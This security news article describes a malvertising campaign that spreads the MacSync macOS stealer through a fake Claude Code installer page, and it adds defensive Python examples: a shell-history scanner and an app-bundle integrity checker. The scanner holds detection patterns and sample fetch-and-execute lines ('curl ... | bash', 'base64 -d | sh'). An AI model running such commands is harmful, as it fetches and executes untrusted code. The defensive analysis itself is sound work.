Weaponized Google Ads Deliver MacSync Stealer, Targeting macOS Credentials and Crypto Wallets
A malicious Google ad campaign is distributing the MacSync Stealer malware via a fake Claude Code CLI installer, aiming to harvest macOS credentials and crypto seed phrases.

A sophisticated attack campaign is leveraging weaponized Google ads to distribute the MacSync Stealer malware on macOS systems. The campaign lures unsuspecting users by impersonating Anthropic’s Claude Code CLI, a popular tool for developers. Researchers at Beelzebub Labs discovered the operation after analyzing a suspicious terminal command, revealing a multi-stage attack designed to steal credentials and, critically, crypto seed phrases from users of Ledger hardware wallets.
The initial vector is a sponsored Google search result for terms like "claude code mac install." This result directs users to a convincing fake install page hosted on Google Sites, which closely mimics Anthropic's official branding. To further deceive victims, the page includes a fabricated download counter and a one-click button to copy a malicious terminal command. The use of Google Sites is a deliberate tactic, as its JavaScript-rendered content can evade automated security scanners, making the malicious link appear safe while remaining fully convincing to human users.
The attack chain is meticulously crafted to build trust and bypass user suspicion. Before a victim executes any command, the fake page provides a "New to Terminal?" guide that includes a simulated installation process. This guide intentionally primes the user to expect and enter their administrator password, making a subsequent, genuine-looking password prompt appear normal rather than suspicious. Once the password is provided, it is used to unlock the macOS keychain and extract sensitive credentials.
The malware, identified as MacSync Stealer version 1.1.2, employs a three-stage dropper. The initial command, once executed, silently downloads and runs a script that fetches the main payload. This payload then force-quits the Terminal application to erase its tracks before initiating the credential harvesting process. The AppleScript-based stealer is designed to be stealthy, redirecting all output to prevent visible signs of execution.
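The dropper described above starts with a copied terminal one-liner, and the stealer hides its AppleScript activity by silencing output. A defender can hunt for that shape of command in shell history on a suspect machine. The following is an added example, not code from the article or from Beelzebub Labs: it scans constructed shell-history lines (zsh extended-history prefixes included) for remote scripts piped straight into a shell, base64-decoded content piped into a shell, and `osascript` invocations whose output is redirected away. The patterns are heuristic assumptions about what such a command looks like; the actual command used by the campaign is not reproduced here.

```python
import re
from typing import Dict, List

# Heuristics for the kind of one-liner the article describes. These are
# assumptions about the general shape of such commands, not indicators
# taken from the real campaign.
SUSPICIOUS_PATTERNS = [
    # a remote script fetched and executed without ever touching disk
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # AppleScript run with stdout and stderr silenced
    ("silenced-osascript", re.compile(r"\bosascript\b.*>\s*/dev/null\s*2>&1")),
    # an obfuscated payload decoded and executed in one go
    ("base64-decode-exec", re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b")),
]

# zsh extended history stores lines as ": <epoch>:<elapsed>;<command>"
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")


def normalize(line: str) -> str:
    """Strip the zsh extended-history prefix and surrounding whitespace."""
    return ZSH_PREFIX.sub("", line).strip()


def scan_history(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per history line that matches a heuristic.

    Each finding records the rule that fired and the normalized command
    so an analyst can pivot to the URL or script it references.
    """
    findings = []
    for raw in lines:
        cmd = normalize(raw)
        for rule, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(cmd):
                findings.append({"rule": rule, "command": cmd})
                break  # one finding per line is enough for triage
    return findings


# Constructed sample history; the URL is a reserved placeholder domain.
SAMPLE_HISTORY = [
    "brew install node",
    ": 1700000000:0;curl -fsSL https://example.invalid/install.sh | bash",
    "osascript -e 'display dialog \"hi\"' > /dev/null 2>&1",
    "git status",
    "echo aGVsbG8= | base64 -d | sh",
]

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(f"[{finding['rule']}] {finding['command']}")
```

On a real host, feed it `~/.zsh_history` or `~/.bash_history`; a hit is a lead to triage, not proof of compromise, since plenty of legitimate installers also use `curl | bash`.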
With the stolen administrator password, MacSync Stealer systematically harvests a wide array of sensitive information. This includes saved logins from numerous Chromium-based and Firefox browsers, cryptocurrency wallet extensions and desktop applications, SSH keys, cloud configuration files (AWS, Kubernetes), Telegram sessions, Safari history, and Apple Notes. The malware also scans for sensitive documents within common user directories like Desktop, Documents, and Downloads.
A particularly dangerous aspect of this campaign is its ability to target cryptocurrency holders. If a user has installed the Ledger Live or Ledger Wallet applications, the malware silently replaces the legitimate application code with a trojanized version. Upon the next launch of these applications, the user will be prompted to enter their crypto seed phrase, which is then captured by the attackers, leading to the potential theft of all associated funds.
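Because the campaign swaps the contents of an installed wallet application rather than installing something new, the defensive check is application-bundle integrity. On macOS the first step is `codesign --verify --deep --strict` against the bundle, which fails once signed files are altered; the added example below, which is not the article's or Ledger's code, shows the complementary hash-baseline approach that also flags added or changed files codesign does not cover. It builds a SHA-256 manifest of every file under a bundle, then compares a later manifest against it. The `demo()` function constructs a throwaway fake bundle in a temporary directory, tampers with it, and returns the differences; the bundle name and file contents are invented for the illustration.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path
from typing import Dict, List


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file path (relative to root, POSIX style) to its SHA-256."""
    base = Path(root)
    manifest = {}
    for path in sorted(p for p in base.rglob("*") if p.is_file()):
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
        manifest[path.relative_to(base).as_posix()] = digest
    return manifest


def compare_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files that appeared, vanished, or changed since the baseline."""
    shared = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(k for k in shared if baseline[k] != current[k]),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a fake bundle, tamper, re-check."""
    tmp = Path(tempfile.mkdtemp())
    try:
        contents = tmp / "Example Wallet.app" / "Contents"
        (contents / "MacOS").mkdir(parents=True)
        (contents / "Resources").mkdir()
        # invented placeholder files standing in for a real bundle
        (contents / "MacOS" / "Example Wallet").write_bytes(b"original main binary")
        (contents / "Resources" / "app.asar").write_bytes(b"original renderer bundle")
        (contents / "Info.plist").write_text("<plist/>")

        baseline = build_manifest(tmp)  # taken at install time

        # simulate the kind of in-place replacement the article describes
        (contents / "Resources" / "app.asar").write_bytes(b"modified renderer bundle")
        (contents / "Resources" / "extra.js").write_bytes(b"new file")

        current = build_manifest(tmp)  # taken during a later check
        return compare_manifests(baseline, current)
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice the baseline manifest must be stored somewhere the local administrator account cannot rewrite, since the malware holds that password; a copy on a separate device or in a read-only location is the minimum.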
While the attack chain is designed to be seamless, certain user actions can break the chain. For instance, if a victim reboots their system or closes their laptop before the data exfiltration or wallet trojanization stages are complete, they may escape the full impact of the compromise. However, the initial credential theft and keychain compromise can still occur even if these later stages are interrupted.
This campaign highlights the evolving tactics of cybercriminals who are increasingly using deceptive advertising and social engineering to distribute sophisticated malware. The targeting of developer tools like Claude Code and critical applications like crypto wallets underscores the high-value targets these attackers are pursuing, making vigilance and robust security practices essential for all macOS users.